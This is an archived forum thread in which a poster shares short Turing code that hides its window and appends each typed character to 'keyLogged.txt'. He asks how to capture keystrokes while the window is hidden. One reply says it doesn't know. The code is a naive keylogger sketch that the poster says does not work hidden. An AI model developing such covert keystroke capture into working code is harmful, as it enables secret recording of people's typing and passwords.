Input And Hide Window

Computer builds, hardware and software discussion or troubleshooting, including peripherals. Essentially a general place to talk about desktop computers.
Locked
Anonymous

Input And Hide Window

Post by Anonymous »

Is it possible to read keystrokes while the window is hidden? It says it's impossible! Here's my code:

Code: Select all

var file : int
var ch : char
Window.Hide (defWinID)

loop
    if hasch then
        ch := getchar
        put ch ..
        open : file, "keyLogged.txt", put, mod, seek
        seek : file, *
        put : file, ch ..
        close : file
    end if
end loop
[code] 

[color=#888888][size=85]Archived topic from Iceteks,  old topic ID:4356, old post ID:35047[/size][/color]
syb
Posts: 222
Joined: Wed Jun 18, 2003 10:12 pm

Input And Hide Window

Post by syb »

I wouldn't know. I never got that far in turning.

Archived topic from Iceteks, old topic ID:4356, old post ID:37835
The wisdom of sight comes from the father of lights
Locked